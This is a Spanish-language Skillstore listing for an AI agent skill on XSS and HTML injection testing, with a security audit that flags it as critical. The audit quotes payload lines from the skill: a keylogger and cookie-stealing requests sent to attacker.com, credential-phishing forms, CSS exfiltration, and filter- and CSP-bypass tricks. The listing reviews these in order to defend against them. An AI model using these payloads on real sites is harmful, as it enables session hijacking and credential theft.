Habilidades xss-html-injection
📦

xss-html-injection

Revisión del contenido r2 Crítico Contiene scripts⚙️ Comandos externos🌐 Acceso a red📁 Acceso al sistema de archivos

Evaluar riesgos de XSS e inyección HTML

Las fallas de inyección del lado del cliente pueden exponer sesiones, datos de cuentas y la confianza de los usuarios. Esta habilidad ayuda a los testers autorizados a estructurar evaluaciones de XSS con una guía clara de remediación.

Compatible con: Claude Codex Code(CC)
⚠️ 38 Deficiente

Instalar con mi Agente

Copia esta solicitud en tu Agente. Incluye la página canónica del Skill y el manifiesto.

Solicitud de agente
Review the Skillstore skill "xss-html-injection" from https://skillstore.io/skills/sickn33-xss-html-injection.md and its manifest at https://skillstore.io/api/skills/sickn33-xss-html-injection/manifest. Verify the artifact. Do not auto-install. Inspect the skill and report your findings, then wait for an operator or manual installation decision.

Tu Agente debe seguir mostrando su plan y solicitar cualquier confirmación exigida por la política de seguridad.

Recursos legibles por agentes

Usa estos enlaces cuando un agente de IA, crawler o script necesite contexto limpio en vez de leer la página completa.

Pruébalo

Usando "xss-html-injection". Una página de búsqueda refleja el valor de la consulta en el encabezado de la página sin codificación visible.

Resultado esperado:

La salida identifica el riesgo de XSS reflejado, enumera evidencia de validación segura, explica el impacto en el usuario y recomienda codificación de salida según el contexto.

Usando "xss-html-injection". Una biografía de perfil se almacena y se muestra a otros usuarios autenticados después del envío.

Resultado esperado:

La salida clasifica el riesgo de XSS almacenado, señala los roles afectados, sugiere recopilación de pruebas y recomienda saneamiento junto con refuerzo de CSP.

Usando "xss-html-injection". El código frontend lee el fragmento de URL y lo escribe en un mensaje de bienvenida.

Resultado esperado:

La salida marca riesgo de DOM XSS, rastrea la ruta de fuente a receptor y recomienda inserción solo como texto o un saneador confiable.

Auditoría de seguridad

Crítico

The skill is an offensive XSS testing guide with explicit authorization gates. It also supplies operational keylogging, session theft, phishing, and defense-evasion instructions that create critical misuse risk. Syntax inventories, Markdown fences, placeholder targets, and defensive limitations were dismissed as false positives.

2
Archivos escaneados
533
Líneas analizadas
17
Elementos de revisión
0
Falsos positivos ignorados

Preocupaciones de seguridad confirmadas (8)

Crítico
Keylogger keywords
<!-- Keylogger injection -->
The section provides a working document-wide keylogger that transmits each keystroke to an attacker endpoint.
Crítico
Actionable Credential and Session Theft Workflow
The guide teaches persistent keylogging, cookie theft, session-data capture, and credential harvesting with attacker-controlled collection endpoints.
The cited sections contain complete browser payloads that collect sensitive data and transmit it to attacker endpoints.
Alto
Base64 encode
new Image().src='http://attacker.com/c='+btoa(document.cookie);
The code encodes document.cookie before transmitting it to an attacker endpoint, obscuring stolen session data.
Alto
Phishing Delivery and Interface Impersonation Guidance
The guide recommends phishing channels and supplies injected forms and full-page frames that imitate trusted interfaces to capture credentials.
The text explicitly labels phishing delivery methods and provides credential forms and interface-overlay examples.
Alto
Security Control Evasion Guidance
The guide catalogs encoding, obfuscation, CSP bypass, and WAF bypass methods that increase payload reliability against deployed defenses.
The cited sections explicitly present filter-bypass payloads and troubleshooting steps for bypassing CSP and WAF controls.
Medio
Base64 decode
<script>eval(atob('YWxlcnQoMSk='))</script> <!-- security-allowlist: controlled XSS obfuscation exam
Base64 decoding is intentionally combined with eval to conceal an executable XSS payload from filters.
Medio
Unicode escape sequence
<script>\u0061lert(1)</script>
The Unicode escape is presented as an encoding bypass for an executable XSS payload.
Medio
Unicode escape sequence
<img src=x onerror=\u0061\u006cert(1)>
The Unicode escapes conceal an event-handler payload to bypass input filtering.
Elementos de revisión de capacidades (17)

Estas son capacidades locales reales que pueden esperarse para esta habilidad, por lo que requieren revisión, pero no se cuentan como comportamiento malicioso confirmado.

Crítico
Hardcoded URL
new Image().src='http://attacker.com/log?k='+e.key;
The URL receives each captured key from a document-wide keypress handler, forming an operational keylogger.
Alto
Dynamic code evaluation with eval()
<script>eval('al'+'ert(1)')</script> <!-- security-allowlist: controlled XSS obfuscation example -->
Line 314 provides an executable eval payload designed to evade simple filters through string concatenation.
Alto
Dynamic code evaluation with eval()
<script>eval(atob('YWxlcnQoMSk='))</script> <!-- security-allowlist: controlled XSS obfuscation exam
Line 323 combines Base64 decoding with eval in an executable XSS obfuscation payload.
Alto
Fetch API call
fetch('http://attacker.com/capture',{
The fetch sends cookies and the current URL to an attacker endpoint as a session-hijacking payload.
Alto
Fetch API call
fetch('https://attacker.com/log',{
The fetch transmits cookies, local storage, and the current URL to an attacker endpoint.
Alto
Hardcoded URL
document.location='http://attacker.com/steal?c='+document.cookie
The URL receives document.cookie through a forced navigation, providing a directly usable cookie-theft payload.
Alto
Hardcoded URL
fetch('http://attacker.com/capture',{
The attacker URL is the destination for exfiltrated cookies and page location data.
Alto
Hardcoded URL
<form action="http://attacker.com/phish" method="POST">
The form posts usernames and passwords to an attacker endpoint while impersonating an expired login.
Alto
Hardcoded URL
<form action="http://attacker.com/capture">
The injected form submits entered credentials to an attacker endpoint, enabling credential theft.
Alto
Hardcoded URL
input[value^="a"]{background:url(http://attacker.com/a)}
The CSS rule makes attacker-controlled requests based on input values, demonstrating side-channel data exfiltration.
Alto
Hardcoded URL
input[value^="b"]{background:url(http://attacker.com/b)}
The CSS rule leaks whether an input begins with a chosen character through an attacker-controlled request.
Alto
Hardcoded URL
<iframe src="http://attacker.com/phishing" style="position:absolute;top:0;left:0;width:100%;height:1
The full-page iframe loads an attacker phishing page and can visually replace the legitimate interface.
Alto
Hardcoded URL
new Image().src='http://attacker.com/c='+btoa(document.cookie);
The image request sends a Base64-encoded session cookie to an attacker endpoint.
Alto
Hardcoded URL
fetch('https://attacker.com/log',{
The attacker URL receives cookies, local storage, and page location through the accompanying fetch.
Alto
Hardcoded URL
i.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
The image URL transmits document.cookie to an attacker endpoint in a stored-XSS example.
Alto
Hardcoded URL
https://shop.example.com/search?q=%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/log?c='+do
The crafted URL embeds a payload that sends document.cookie to an attacker endpoint and is intended for phishing delivery.
Alto
Hardcoded URL
<script src="https://cdn.trusted.com/api/jsonp?callback=alert"></script>
The URL demonstrates loading a JSONP response as script to bypass an existing Content Security Policy.

Patrones detectados

Keylogger keywords
Compartir y citar este informe

Comparte el informe de evaluación versionado, la insignia neutral, la tarjeta insertable y las citas. Skillstore presenta evidencias sin decidir si este Skill es seguro.

Abrir el informe versionado
Evaluación de seguridad

Copiar enlace del informe

https://skillstore.io/skills/sickn33-xss-html-injection/audits/6?utm_source=security_passport&utm_medium=share&utm_campaign=versioned_report

Insignia Markdown

[![Skillstore security assessment](https://skillstore.io/badges/skills/sickn33-xss-html-injection/security.svg)](https://skillstore.io/skills/sickn33-xss-html-injection?utm_source=security_passport_badge)

Insignia HTML

<a href="https://skillstore.io/skills/sickn33-xss-html-injection?utm_source=security_passport_badge"><img src="https://skillstore.io/badges/skills/sickn33-xss-html-injection/security.svg" alt="Skillstore security assessment" loading="lazy"></a>

Tarjeta para insertar

<iframe src="https://skillstore.io/embed/skills/sickn33-xss-html-injection.html" title="Skillstore Security Assessment" sandbox="allow-popups allow-popups-to-escape-sandbox" loading="lazy" referrerpolicy="no-referrer" width="420" height="180"></iframe>
Citas académicas (APA · BibTeX · CFF)

Cita APA

zebbern. (2026). xss-html-injection security audit report (audit version 6) [Author version unspecified]. Skillstore. https://skillstore.io/skills/sickn33-xss-html-injection/audits/6

Cita BibTeX

@techreport{zebbern-sickn33-xss-html-injection-2026, author = {zebbern}, title = {xss-html-injection security audit report (audit version 6)}, institution = {Skillstore}, year = {2026}, number = {6}, url = {https://skillstore.io/skills/sickn33-xss-html-injection/audits/6}, note = {Author version unspecified} }

CITATION.cff

cff-version: 1.2.0 message: "If you use this Skill, cite its author and this versioned security audit report." title: "xss-html-injection security audit report (audit version 6)" version: "unspecified" type: report authors: - name: "zebbern" date-released: "2026-09-07" url: "https://skillstore.io/skills/sickn33-xss-html-injection/audits/6" identifiers: - type: other value: "skillstore:sickn33-xss-html-injection:audit:6" description: "Skillstore immutable audit report identifier"

Puntuación de Skillstore

Por qué esta puntuación Confianza de la evidencia: Medio
41
Arquitectura
85
Mantenibilidad
87
Contenido
71
Comunidad
83
Cumplimiento de la especificación

Lo que puedes crear

Validar entradas de aplicaciones web

Planificar comprobaciones autorizadas de XSS en formularios, perfiles, comentarios y parámetros de URL.

Preparar informes para clientes

Convertir el comportamiento de inyección observado en notas claras sobre gravedad, impacto y remediación.

Revisar flujos de datos frontend

Rastrear datos controlados por el navegador hacia receptores DOM antes del lanzamiento.

Prueba estos prompts

Encontrar áreas de prueba de XSS
Enumera áreas probables de prueba de XSS e inyección HTML para esta aplicación autorizada: [describe pages, forms, and user roles].
Planificar validación segura
Crea un plan de validación de XSS no destructivo para esta funcionalidad dentro del alcance: [feature]. Incluye entradas, reflejos esperados y evidencia a recopilar.
Analizar flujo DOM
Revisa esta descripción de flujo de datos DOM para detectar riesgo de XSS: [sources, transformations, sinks]. Explica la explotabilidad probable y patrones más seguros.
Redactar informe de remediación
Convierte estas observaciones de pruebas de XSS en un hallazgo listo para el cliente con gravedad, impacto, resumen de reproducción, causa raíz y remediación: [observations].

Mejores prácticas

  • Usar solo cuentas dentro del alcance, dominios aprobados y datos no productivos.
  • Recopilar capturas de pantalla, solicitudes, respuestas y observaciones del navegador para cada hallazgo.
  • Priorizar la remediación con codificación de salida, APIs DOM seguras, saneamiento y CSP.

Evitar

  • No probar objetivos sin autorización por escrito.
  • No recopilar credenciales reales, tokens de sesión ni datos personales.
  • No compartir enlaces de entrega de exploits con usuarios fuera del alcance aprobado.

Preguntas frecuentes

¿Esta habilidad es solo para pruebas autorizadas?
Sí. Úsala solo con autorización por escrito, alcance definido y manejo aprobado de cualquier evidencia sensible.
¿Puede confirmar XSS automáticamente?
No. Proporciona una estructura de evaluación, pero la confirmación requiere pruebas controladas y evidencia de la aplicación objetivo.
¿Cubre XSS basado en DOM?
Sí. Explica cómo revisar fuentes controladas por el navegador y receptores DOM peligrosos.
¿Incluye guía de remediación?
Sí. Cubre codificación de salida, saneamiento, APIs DOM más seguras, flags de cookies y Content Security Policy.
¿Pueden los desarrolladores usarla antes del lanzamiento?
Sí. Los desarrolladores pueden usarla para revisar flujos de datos riesgosos y planificar validación segura antes del despliegue.
¿Qué evidencia debe incluir un informe?
Incluye URLs afectadas, ubicaciones de entrada, capturas de pantalla, detalles de solicitudes, comportamiento del navegador, impacto y pasos precisos de remediación.

Detalles del desarrollador

Autor

zebbern

Licencia

MIT

Revisión de Skillstore

r2

Aviso de versión

El autor no declaró una versión.

Ref.

b1ef80115e869b66867d4eac8e3c8dc56a393a8d

Actualidad del mantenimiento

7/9/2026

Uso

9 descargas · 241 vistas

Estructura de archivos